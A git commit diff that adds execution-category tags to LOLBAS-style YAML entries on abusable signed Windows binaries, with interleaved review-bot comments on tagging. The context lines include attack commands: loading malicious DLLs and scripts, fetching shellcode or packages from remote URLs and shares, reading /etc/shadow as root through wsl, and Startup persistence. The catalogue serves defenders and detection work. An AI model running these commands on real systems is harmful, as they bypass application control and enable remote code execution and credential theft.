Adding Execute tags to most LOLBas (#405)

hegusung
2024-12-29 18:31:01 +01:00
committed by GitHub
parent baaa5bbc73
commit b9a6cd6a87
129 changed files with 520 additions and 59 deletions

View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
- Execute: DLL (.NET)
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker.
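Review bot: anything that filters on the old `Execute: DLL` value (the site's tag filter, a validator with an allowed-value list) will stop matching these entries once the value becomes `DLL (.NET)`; confirm the new value is part of the accepted tag vocabulary next to `DLL`, and that it is spelled identically in the other files touched by this commit (dotnet also uses `- Execute: DLL (.NET)`).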
@@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
- Execute: DLL (.NET)
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe

View File

@@ -18,6 +18,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: All Windows
Tags:
- Execute: CMD
- Command: adplus.exe -c config-adplus.xml
Description: Dump process memory using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
@@ -32,6 +34,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: All windows
Tags:
- Execute: CMD
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
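Review bot: style: the OperatingSystem value in this hunk's context reads `All windows`, while the previous entry in the same file has `OperatingSystem: All Windows`; since the file is being edited anyway, normalise the casing in the same change.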

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- Execute: PowerShell
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
Usecase: Execute a provided EXE
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe
Code_Sample:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml
Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.
Usecase: Execute custom made MSI file with malicious code
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1218.007
OperatingSystem: Windows
Tags:
- Execute: MSI
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe
- Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: CMD
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
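Review bot: the entry tagged here (the one whose Command calls `$e.RegisterXLL('\\webdav\xll_poc.xll')`) pulls its payload from a UNC path, yet receives only `- Execute: EXE`; elsewhere in this commit a UNC or URL source also gets `- Execute: Remote` (bginfo, Remote.exe, devinit), so add that tag here as well, and consider whether `EXE` is the right primary tag when what actually runs is an XLL add-in loaded through powershell.exe.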

View File

@@ -49,6 +49,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Execute: Remote
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
@@ -58,6 +59,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Execute: Remote
Full_Path:
- Path: no default
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: Shellcode
- Command: |
cdb.exe -pd -pn <process_name>
.shell <cmd>
@@ -20,6 +22,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CMD
- Command: cdb.exe -c C:\debug-script.txt calc
Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
@@ -27,6 +31,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe

View File

@@ -20,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1055
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
Usecase: Execute DLL code
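Review bot: the `coregen.exe /L C:\folder\evil.dll` entry that follows this hunk receives no Tags block in this change (there is no second hunk for the file), while the other DLL-loading entries in the commit do; add `- Execute: DLL` to it so the file is tagged consistently.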

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CSharp
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
Code_Sample:

View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: MSI
- Execute: Remote
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\Tools\devinit\devinit.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\Tools\devinit\devinit.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed
Tags:
- Execute: CMD
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed
Tags:
- Execute: CMD
Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe'
Code_Sample:
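Review bot: `- Execute: CMD` looks like the wrong tag for the entry it lands on, whose Command is `devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test` and whose Usecase is "Execute any binary with given arguments"; comparable launch-a-binary entries in this commit (AgentExecutor "Execute a provided EXE", Remote.exe `/s "powershell.exe"`) use `- Execute: EXE`, so use that value here.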

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed
Tags:
- Execute: DLL (.NET)
- Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any DLL.
Usecase: Execute DLL
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed
Tags:
- Execute: DLL (.NET)
- Command: dotnet.exe fsi
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
Usecase: Execute arbitrary F# code
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 and up with .NET SDK installed
Tags:
- Execute: FSharp
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL
@@ -32,6 +38,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 and up with .NET Core installed
Tags:
- Execute: CSharp
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\dxcap.exe
- Path: C:\Windows\SysWOW64\dxcap.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: FSharp
- Command: fsi.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: FSharp
Full_Path:
- Path: C:\Program Files\dotnet\sdk\<version>\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: FSharp
- Command: fsianycpu.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: FSharp
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Mftrace.exe powershell.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
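Review bot: the context lines of this hunk expose a pre-existing mismatch worth fixing while the file is open: the Command is `Mftrace.exe powershell.exe` and the Usecase names powershell.exe, but the Description reads "Launch cmd.exe as a subprocess of Mftrace.exe."; change the Description to powershell.exe (or the Command to cmd.exe) so the three lines agree.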
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
Tags:
- Execute: CMD
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.
Usecase: Local execution of batch file using msdeploy.exe.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
Tags:
- Execute: CMD
- Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe
Description: Copy file from source to destination.
Usecase: Copy file.

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1220
OperatingSystem: Windows
Tags:
- Execute: XSL
- Command: msxsl.exe customers.xml script.xsl
Description: Run COM Scriptlet code within the script.xsl file (local).
Usecase: Local execution of script stored in XSL file.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1220
OperatingSystem: Windows
Tags:
- Execute: XSL
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
@@ -25,6 +29,9 @@ Commands:
Privileges: User
MitreID: T1220
OperatingSystem: Windows
Tags:
- Execute: XSL
- Execute: Remote
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
@@ -32,6 +39,9 @@ Commands:
Privileges: User
MitreID: T1220
OperatingSystem: Windows
Tags:
- Execute: XSL
- Execute: Remote
- Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>
Description: Using remote XML and XSL files, save the transformed XML file to disk.
Usecase: Download a file from the internet and save it to disk.
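Review bot: the entry whose tags are added at the top of this hunk is a verbatim copy of the entry tagged in the previous hunk (the remote `shellcode.xml` Command line with its "(remote)" Description and Usecase appears twice in a row), so the same content now carries tags twice; remove the duplicate entry instead of tagging it.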

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CSharp
- Command: rcsi.exe bypass.csx
Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
@@ -25,6 +29,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Execute: Remote
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: PowerShell
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
- Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: PowerShell
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Code_Sample:

View File

@@ -18,6 +18,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --update [url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -25,6 +28,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -32,6 +38,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -39,6 +48,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
Full_Path:
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Squirrel.exe'
Code_Sample:
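Review bot: the entry tagged at the top of this hunk repeats the previous one verbatim (`squirrel.exe --updateRollback=[url to package]` with identical Description and Usecase appears twice in a row); deduplicate the entries rather than adding tags to each copy.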

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: te.exe test.dll
Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.
Usecase: Execute DLL file.
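Review bot: the `te.exe test.dll` entry following this hunk ("Execute DLL file.") gets no Tags block in this change, since the added `- Execute: WSH` belongs to the entry above the hunk; add `- Execute: DLL` to the DLL entry so the file is fully tagged.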

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Node.JS
- Command: teams.exe
Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing.
Usecase: Execute JavaScript code
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Node.JS
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
Usecase: Executes a process under a trusted Microsoft signed binary
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Teams.exe'
Code_Sample:

View File

@@ -18,6 +18,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -25,6 +28,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
@@ -32,6 +38,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
@@ -39,6 +48,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
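Review bot: the entry whose tags are added at the top of this hunk repeats the previous one verbatim (`Update.exe --update=\\remoteserver\payloadFolder`, same Description and Usecase), and the same pattern recurs twice more below in this file (`--updateRollback=[url to package]` and `--updateRollback=\\remoteserver\payloadFolder` each appear twice in a row); deduplicate those entries rather than tagging every copy.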
@@ -46,6 +58,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
@@ -53,6 +68,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass
@@ -60,6 +78,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: CMD
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
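Review bot: `- Execute: Remote` does not fit the entry it is added to here: that entry's Command is `Update.exe --processStart payload.exe --process-start-args "whatever args"` and its Description says to copy the payload into `%userprofile%\AppData\Local\Microsoft\Teams\current\` first, so nothing remote is fetched. It also gets `CMD` here while the second `--processStart payload.exe` entry later in this file gets `CMD` alone; since both launch a local executable, tag both with `- Execute: EXE` (the value used for the same pattern in AgentExecutor and Remote.exe) and drop `Remote` from this one.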
@@ -67,6 +88,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
@@ -74,6 +98,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
@@ -81,6 +108,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: CMD
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary
@@ -88,6 +117,8 @@ Commands:
Privileges: User
MitreID: T1547
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Usecase: Execute binary
@@ -95,6 +126,8 @@ Commands:
Privileges: User
MitreID: T1070
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
Full_Path:
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe'
Code_Sample:
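Review bot: `- Execute: EXE` is misleading on the entry it lands on: that entry's Command is `Update.exe --removeShortcut=payload.exe -l=Startup`, its MitreID is T1070, and it only deletes the Startup-folder shortcut without executing anything; leave this entry without an Execute tag so tag filters do not surface it as an execution primitive.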

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe"
Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.
Usecase: Proxy execution of binary with arguments
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 and up with VS/VScode installed
Tags:
- Execute: EXE
Full_Path:
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
Code_Sample:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: .NetObjects
Full_Path:
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\arm64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\x64\UIAVerify\VisualUiaVerifyNative.exe
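Review bot: `- Execute: .NetObjects` introduces a tag value that appears nowhere else in this commit and is formatted unlike the others (leading dot, CamelCase, against `DLL (.NET)`, `CSharp`, `FSharp`); if the intent is the managed-code category used elsewhere, reuse one of those values, otherwise add the new value to whatever list the tags are validated against.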

View File

@@ -20,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: VSLaunchBrowser.exe .exe \\Server\Path\file
Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
@@ -27,6 +29,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
- Execute: Remote
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\<version>\x64\vshadow.exe
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\vsjitdebugger.exe
Code_Sample:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags:
- Execute: XOML
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags:
- Execute: EXE
- Command: wsl.exe -u root -e cat /etc/shadow
Description: Cats /etc/shadow file as root
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags:
- Execute: CMD
- Command: wsl.exe --exec bash -c "<command>"
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Usecase: Performs execution of arbitrary Linux commands.
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags:
- Execute: CMD
